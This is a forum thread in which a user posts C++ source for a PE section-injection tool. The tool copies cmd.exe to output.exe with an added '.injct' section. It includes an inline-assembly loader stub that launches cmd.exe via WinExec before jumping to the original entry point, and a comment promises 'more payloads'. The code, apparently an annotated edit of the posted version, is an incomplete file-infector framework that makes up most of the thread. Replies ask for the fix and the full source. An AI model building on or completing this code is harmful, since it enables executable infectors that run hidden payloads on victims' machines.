
Problem with PE section Injection


DarkInjection


DarkInjection
Posted

hello this is my first post here :)

i m writing a program to add a new section into the PE at the moment....

but something goes wrong. im trying to locate what is wrong but nothing yet

u can find the source here:

infection.h

/*
 * StaffToUse - scratch record filled by main.cpp: values copied out of the
 * parsed PE headers plus three API addresses resolved with GetProcAddress()
 * in the tool's own process.
 */
typedef struct _StaffToUse
{
    DWORD EIP;                  // OptionalHeader.AddressOfEntryPoint of the input file (an RVA)
    DWORD IMAGE_BASE;           // OptionalHeader.ImageBase of the input file
    DWORD VEP;                  // AddressOfEntryPoint + ImageBase, computed in readFileHeaders()
    DWORD NumbOfSections;       // FileHeader.NumberOfSections as read from the input file
    DWORD WinExec_;             // GetProcAddress result for "WinExec", cast to an integer in main()
    DWORD LoadLib_;             // GetProcAddress result for "LoadLibrary", cast to an integer in main()
    DWORD ExitProc_;            // GetProcAddress result for "ExitProcess", cast to an integer in main()
    // The four arrays below are declared as pointer arrays, but readFileHeaders()
    // stores the section header's integer fields in them via an (unsigned long*) cast.
    // NOTE(review): nothing in the visible code dereferences these entries.
    DWORD *VirtualS[32];        // per-section Misc.VirtualSize
    DWORD *SizeOfRaw[32];       // per-section SizeOfRawData
    DWORD *PointerToRaw[32];    // per-section PointerToRawData
    DWORD *VirtualAddr[32];     // per-section VirtualAddress
    BYTE *SectionNames[32];     // points at the Name field of the matching _img_[] entry
} StaffToUse;

/* DWDataStorage - owner of one heap buffer holding a copy of a section's raw data. */
typedef struct _DWDataStorage
{
    BYTE *dwData;               // malloc'd in readFileHeaders(); never freed in the visible code
} DWDataStorage;
//cracps
// NOTE(review): everything below is a variable *definition* inside a header.
// That only links cleanly while exactly one source file includes infection.h.

HANDLE hFile,oFile = NULL;          // hFile: input file opened in readFileHeaders(); oFile: "output.exe" created in main()
                                    // (only oFile carries the explicit initializer)
DWORD dwBytesRead;                  // byte count out-parameter, reused for both ReadFile and WriteFile
DWORD Sections;                     // section count of the input file, before a section is added
DWORD fSize = 0;                    // size of the input file as returned by GetFileSize()
PCHAR pMem;                         // scratch buffer of fSize bytes that main() stages each write through
IMAGE_NT_HEADERS _nt;               // copy of the input file's NT headers; NumberOfSections is bumped by AddNewSection()
DWDataStorage dw_[32];              // per-section copies of the raw section data
IMAGE_DOS_HEADER header;            // copy of the input file's DOS header
IMAGE_SECTION_HEADER *_img;         // cursor walking the section table inside ptrBuffer
IMAGE_SECTION_HEADER _img_[32];     // copy of the section table; AddNewSection() fills one more slot
StaffToUse _help_my_ass;            // collected header values and API addresses (see StaffToUse)
PIMAGE_SECTION_HEADER Custom_hdr;   // only referenced from a commented-out memcpy in AddNewSection()
BYTE *ptrBuffer;                    // the whole input file, read into memory
DWORD stub_size;                    // e_lfanew - sizeof(IMAGE_DOS_HEADER)
BYTE *stub;                         // copy of the bytes between the DOS header and the NT headers

//

main.cpp

//

#include <stdio.h>
#include <windows.h>
#include "infection.h"//yodap code .......................................................
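/**
 * Round dwTarNum up to the next multiple of dwAlignTo.
 *
 * Both callers in this file pass FileAlignment / SectionAlignment values that
 * were copied straight out of the input file's optional header, so the
 * alignment is untrusted: a value of zero made the original expression divide
 * by zero. A zero alignment now returns dwTarNum unchanged.
 *
 * @param dwTarNum   value to align
 * @param dwAlignTo  alignment granularity; 0 means "no alignment"
 * @return dwTarNum rounded up to a multiple of dwAlignTo (modulo 2^32)
 */
DWORD PEAlign(DWORD dwTarNum,DWORD dwAlignTo)
{
    DWORD dwRemainder;

    if (dwAlignTo == 0) {
        return dwTarNum;
    }

    // Work from the remainder instead of (n + a - 1) / a * a so the
    // intermediate sum cannot wrap for values that are already aligned.
    dwRemainder = dwTarNum % dwAlignTo;
    if (dwRemainder == 0) {
        return dwTarNum;
    }
    return dwTarNum + (dwAlignTo - dwRemainder);
}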
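//...................................................................
/*
 * CmdLoader - inline-assembly stub (32-bit MSVC __asm syntax), kept exactly
 * as posted.
 *
 * What the instructions do, in order:
 *   - save the general registers and flags (pushad / pushfd);
 *   - store the byte values 0x63 0x6d 0x64 0x2e 0x65 0x78 0x65 0x00
 *     ("cmd.exe" plus terminator) at ebp-15 .. ebp-8, using one dword store
 *     per byte;
 *   - push 1 and the address of that string and call the address held in
 *     _help_my_ass.WinExec_ (filled in by main() via GetProcAddress);
 *   - jump to _help_my_ass.VEP (image base + entry point RVA of the parsed
 *     file, set in readFileHeaders()).
 *
 * NOTE(review): nothing in this listing calls CmdLoader or copies its bytes
 * anywhere; main() stops at "write data for the new section later". For
 * triage, the behaviour a sample built around this stub would show is a
 * WinExec("cmd.exe", 1) call before control reaches the original entry point.
 */
void CmdLoader()
{
    //cmd shell
    __asm {
        pushad
        pushfd
        xor eax, eax
        xor ecx, ecx
        mov dword ptr[ebp-15],0x63
        mov dword ptr[ebp-14],0x6d
        mov dword ptr[ebp-13],0x64
        mov dword ptr[ebp-12],0x2e
        mov dword ptr[ebp-11],0x65
        mov dword ptr[ebp-10],0x78
        mov dword ptr[ebp-9],0x65
        mov dword ptr[ebp-8],0x00
        push 0x1
        lea eax, [ebp-15]
        push eax
        mov ecx, _help_my_ass.WinExec_
        call ecx
        mov eax, _help_my_ass.VEP
        jmp eax
    };
    //soon more payloads....
    //....................
}

/*
 * AddNewSection - fill the next free slot of the in-memory section table
 * (_img_) with a header for a new trailing section and increment
 * _nt.FileHeader.NumberOfSections. No section data is produced here.
 *
 * The new header is placed after the last existing section: its raw and
 * virtual offsets are the aligned ends of slot i-1, its sizes are dwSize
 * aligned to FileAlignment / SectionAlignment.
 *
 * Changes against the posted version (memory safety only):
 *   - _img_ has 32 slots and this routine reads slot i-1 and writes slot i,
 *     so it now does nothing unless 1 <= NumberOfSections <= 31;
 *   - IMAGE_SECTION_HEADER.Name is a fixed IMAGE_SIZEOF_SHORT_NAME-byte
 *     field, so the name copy is capped at that length instead of strlen().
 *
 * @param szName  section name; at most IMAGE_SIZEOF_SHORT_NAME bytes are used
 * @param dwSize  requested raw size before alignment
 */
void AddNewSection(char* szName,DWORD dwSize)
{
    DWORD roffset,rsize,voffset,vsize;
    size_t nameLen;
    int i=_nt.FileHeader.NumberOfSections;

    if(szName == NULL || i < 1 || i >= 32){
        return;
    }

    //yodap code............................................................................
    //................
    rsize=PEAlign(dwSize,_nt.OptionalHeader.FileAlignment);
    vsize=PEAlign(rsize,_nt.OptionalHeader.SectionAlignment);
    roffset=PEAlign(_img_[i-1].PointerToRawData+_img_[i-1].SizeOfRawData,_nt.OptionalHeader.FileAlignment);
    voffset=PEAlign(_img_[i-1].VirtualAddress+_img_[i-1].Misc.VirtualSize,_nt.OptionalHeader.SectionAlignment);
    //-------------------------------------------------------------------------------------------------------
    _img_[i].PointerToRawData=roffset;
    _img_[i].VirtualAddress=voffset;
    _img_[i].SizeOfRawData=rsize;
    _img_[i].Misc.VirtualSize=vsize;
    // 0xC0000040 = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA
    _img_[i].Characteristics=0xC0000040;

    nameLen = strlen(szName);
    if(nameLen > IMAGE_SIZEOF_SHORT_NAME){
        nameLen = IMAGE_SIZEOF_SHORT_NAME;
    }
    memcpy(_img_[i].Name,szName,nameLen);

    _nt.FileHeader.NumberOfSections++;
    //memcpy(&Custom_hdr,&_img_[i],sizeof(_img_[i]));
}

// Report a parse failure and release everything readFileHeaders() acquired,
// so a rejected file leaves no open handle or half-filled buffer behind.
static int failRead(const char *msg)
{
    int k;

    MessageBoxA(0,msg,"Error",MB_ICONEXCLAMATION|MB_OK);

    if(hFile != NULL && hFile != INVALID_HANDLE_VALUE){
        CloseHandle(hFile);
        hFile = INVALID_HANDLE_VALUE;
    }
    for(k=0; k<32; k++){
        free(dw_[k].dwData);
        dw_[k].dwData = NULL;
    }
    free(stub);
    stub = NULL;
    free(ptrBuffer);
    ptrBuffer = NULL;
    return 0;
}

/*
 * readFileHeaders - read a PE file into memory and copy its DOS header, DOS
 * stub, NT headers, section table and per-section raw data into the globals
 * declared in infection.h.
 *
 * Every offset and size used here comes from the file itself, so each one is
 * checked against the number of bytes actually read before it is used as a
 * memcpy source, a length, or an allocation size. The posted version did none
 * of these checks; a truncated or malformed file could read or write outside
 * the heap buffers.
 *
 * Checks added:
 *   - GetFileSize failure, and files too small to hold both headers;
 *   - allocation and ReadFile return values;
 *   - e_magic is verified before e_lfanew is trusted;
 *   - e_lfanew must leave room for IMAGE_NT_HEADERS inside the file and must
 *     not point before the end of the DOS header (stub_size would wrap);
 *   - FileAlignment / SectionAlignment must be non-zero (PEAlign divides);
 *   - the section table and each section's raw data must lie inside the file;
 *   - the per-section buffer is never smaller than SizeOfRawData.
 *
 * @param file  path of the file to parse
 * @return 1 on success, 0 on any failure (a message box names the failure;
 *         after the file was opened, the handle and buffers are released)
 */
int readFileHeaders(char*file)
{
    DWORD tableOffset;

    hFile = CreateFile( file,GENERIC_READ,FILE_SHARE_WRITE | FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    if(hFile == INVALID_HANDLE_VALUE){
        MessageBoxA(0,"File Not Found","Error",MB_ICONEXCLAMATION|MB_OK);
        return 0;
    }

    fSize = GetFileSize(hFile,NULL);
    if(fSize == INVALID_FILE_SIZE || fSize < sizeof(IMAGE_DOS_HEADER) + sizeof(IMAGE_NT_HEADERS)){
        return failRead("File Size Error");
    }

    // fSize+1 cannot wrap: INVALID_FILE_SIZE (0xFFFFFFFF) was rejected above
    ptrBuffer = (BYTE*)malloc(fSize+1);
    if(ptrBuffer == NULL){
        return failRead("Out Of Memory");
    }

    //read the file
    if(!ReadFile( hFile, ptrBuffer, fSize, &dwBytesRead, NULL ) || dwBytesRead != fSize){
        return failRead("Read Size Error");
    }

    //copy the dos header
    memcpy(&header, ptrBuffer, sizeof(IMAGE_DOS_HEADER));
    if(header.e_magic != IMAGE_DOS_SIGNATURE){
        return failRead("Not A Valid Dos Stub");
    }

    // e_lfanew is a signed, file-controlled offset
    if(header.e_lfanew < (LONG)sizeof(IMAGE_DOS_HEADER) ||
       (DWORD)header.e_lfanew > fSize - sizeof(IMAGE_NT_HEADERS)){
        return failRead("Not A Valid PE Executable");
    }

    stub_size = header.e_lfanew - sizeof(IMAGE_DOS_HEADER);
    stub = (BYTE*)malloc(stub_size ? stub_size : 1);    // malloc(0) may legitimately return NULL
    if(stub == NULL){
        return failRead("Out Of Memory");
    }
    memcpy(stub,ptrBuffer+ sizeof(IMAGE_DOS_HEADER),stub_size);

    //copy the pe header
    memcpy(&_nt,ptrBuffer + header.e_lfanew,sizeof(IMAGE_NT_HEADERS));
    if(_nt.Signature != IMAGE_NT_SIGNATURE){
        return failRead("Not A Valid PE Executable");
    }
    if(_nt.OptionalHeader.FileAlignment == 0 || _nt.OptionalHeader.SectionAlignment == 0){
        return failRead("Not A Valid PE Executable");
    }

    //place **** to my structure
    _help_my_ass.EIP = _nt.OptionalHeader.AddressOfEntryPoint;
    _help_my_ass.IMAGE_BASE = _nt.OptionalHeader.ImageBase;
    _help_my_ass.VEP = _nt.OptionalHeader.AddressOfEntryPoint + _nt.OptionalHeader.ImageBase;

    //read the sections
    Sections = _nt.FileHeader.NumberOfSections;
    _help_my_ass.NumbOfSections = Sections;
    if( (Sections < 1) || (Sections > 32) ){
        return failRead("Error With File Sections");
    }

    //fill the image section structure
    tableOffset = (DWORD)header.e_lfanew + sizeof(IMAGE_NT_HEADERS);
    if(Sections * sizeof(IMAGE_SECTION_HEADER) > fSize - tableOffset){
        return failRead("Error With File Sections");
    }
    _img = (IMAGE_SECTION_HEADER *)(ptrBuffer + tableOffset);

    for(DWORD i=0; i<Sections; i++){
        memcpy(&_img_[i],_img,sizeof(IMAGE_SECTION_HEADER));
        _help_my_ass.SectionNames[i] = _img_[i].Name;
        _help_my_ass.PointerToRaw[i] = (unsigned long*)_img_[i].PointerToRawData;
        _help_my_ass.SizeOfRaw[i] = (unsigned long*)_img_[i].SizeOfRawData;
        _help_my_ass.VirtualAddr[i] = (unsigned long*)_img_[i].VirtualAddress;
        _help_my_ass.VirtualS[i] =(unsigned long*) _img_[i].Misc.VirtualSize;

        // the raw data range must sit entirely inside the bytes that were read
        if(_img_[i].PointerToRawData > fSize ||
           _img_[i].SizeOfRawData > fSize - _img_[i].PointerToRawData){
            return failRead("Error With File Sections");
        }

        //allocate memory to store the datas from each section
        DWORD size_to = PEAlign(_img_[i].SizeOfRawData,_nt.OptionalHeader.FileAlignment);
        if(size_to < _img_[i].SizeOfRawData){
            size_to = _img_[i].SizeOfRawData;   // alignment wrapped; never allocate less than is copied
        }
        dw_[i].dwData = (BYTE*)malloc(size_to ? size_to : 1);
        if(dw_[i].dwData == NULL){
            return failRead("Out Of Memory");
        }
        //copy them
        memcpy(dw_[i].dwData,ptrBuffer+_img_[i].PointerToRawData,_img_[i].SizeOfRawData);
        _img++;
    }
    return 1;
}

// WriteFile wrapper that treats a short write as a failure.
static BOOL writeAll(HANDLE h,const void *data,DWORD size)
{
    return WriteFile(h,data,size,&dwBytesRead,NULL) && dwBytesRead == size;
}

/*
 * main - parse c:\windows\system32\cmd.exe (opened read-only) and write a
 * copy of its headers and section data, with one extra section header
 * appended, to "output.exe" in the current directory. The input file itself
 * is never written to.
 *
 * Write order is unchanged from the posted version: DOS header, stub bytes,
 * NT headers, section headers, then each original section's raw data.
 *
 * NOTE(review): the thread's author reports that the file produced by this
 * listing is not a working executable. This edit does not address that; it
 * only adds the error handling the posted version lacked:
 *   - stop when readFileHeaders() fails instead of writing from unset buffers;
 *   - check the scratch allocation, the output handle and every write;
 *   - write as many section headers as _nt.FileHeader.NumberOfSections says,
 *     so the loop can never step past the 32-slot _img_ array;
 *   - use %lx for the DWORD in printf;
 *   - close both handles and free the scratch buffer before returning.
 *
 * @return 0 on success, 1 on any failure
 */
int main(){
    char *_file = "c:\\windows\\system32\\cmd.exe";
    DWORD i;
    BOOL ok;

    // addresses are resolved in this process and stored as 32-bit integers
    _help_my_ass.WinExec_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"WinExec");
    _help_my_ass.LoadLib_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"LoadLibrary");
    _help_my_ass.ExitProc_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"ExitProcess");

    if(!readFileHeaders(_file)){
        return 1;
    }
    printf("Current EIP :%lx\n",_help_my_ass.EIP);
    //_nt.OptionalHeader.AddressOfEntryPoint = 0x01ffff;

    // scratch buffer; readFileHeaders() guarantees fSize covers both headers
    // and every section's SizeOfRawData
    pMem = (char*)malloc(fSize);
    if(pMem == NULL){
        MessageBoxA(0,"Out Of Memory","Error",MB_ICONEXCLAMATION|MB_OK);
        CloseHandle(hFile);
        return 1;
    }
    memcpy(pMem,&header,sizeof(IMAGE_DOS_HEADER));

    oFile = CreateFile("output.exe",
                       GENERIC_WRITE,
                       FILE_SHARE_WRITE | FILE_SHARE_READ,
                       NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    if(oFile == INVALID_HANDLE_VALUE){
        MessageBoxA(0,"Cannot Create Output File","Error",MB_ICONEXCLAMATION|MB_OK);
        free(pMem);
        pMem = NULL;
        CloseHandle(hFile);
        return 1;
    }

    //write the DOS HEADER
    ok = writeAll(oFile,pMem,sizeof(IMAGE_DOS_HEADER));
    //write the stub junk****
    ok = ok && writeAll(oFile,stub,stub_size);

    //Make New Section
    AddNewSection(".injct",0x22400);

    //Write NT HEADER
    memcpy(pMem,&_nt,sizeof(IMAGE_NT_HEADERS));
    ok = ok && writeAll(oFile,pMem,sizeof(IMAGE_NT_HEADERS));

    //write the sections
    for(i=0; ok && i<_nt.FileHeader.NumberOfSections; i++){
        memcpy(pMem,&_img_[i],sizeof(IMAGE_SECTION_HEADER));
        ok = writeAll(oFile,pMem,sizeof(IMAGE_SECTION_HEADER));
    }

    //write sections data
    for(i=0; ok && i<Sections; i++){
        memcpy(pMem,dw_[i].dwData,_img_[i].SizeOfRawData);
        ok = writeAll(oFile,pMem,_img_[i].SizeOfRawData);
    }
    //write data for the new section later

    CloseHandle(oFile);
    CloseHandle(hFile);
    free(pMem);
    pMem = NULL;

    if(!ok){
        MessageBoxA(0,"Write Error","Error",MB_ICONEXCLAMATION|MB_OK);
        return 1;
    }
    return 0;
}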

that source generates a wrong executable file instead of a correct one

any help will be gr8full :)

DarkInjection
Posted

anyway i fix that :)

  • 2 weeks later...
Posted

Can you attach a before and after exe to compare?

Posted

Hi.

Looking at this purely from a coder's perspective, if someone came looking for help with adding a section to a PE file and their problem has a similar cause/effect, they might benefit from the information you can provide about why your code was wrong and how you fixed it.

Plus it's only fair (imho) that when you are prepared to ask for help with a coding/rce situation, you should also be prepared to help if you can, and sometimes this is as simple as sharing the fix to your woes.

HR.

Ghandi

Guest GI4C4T
Posted

Hi, can you post full source here?

Thanks
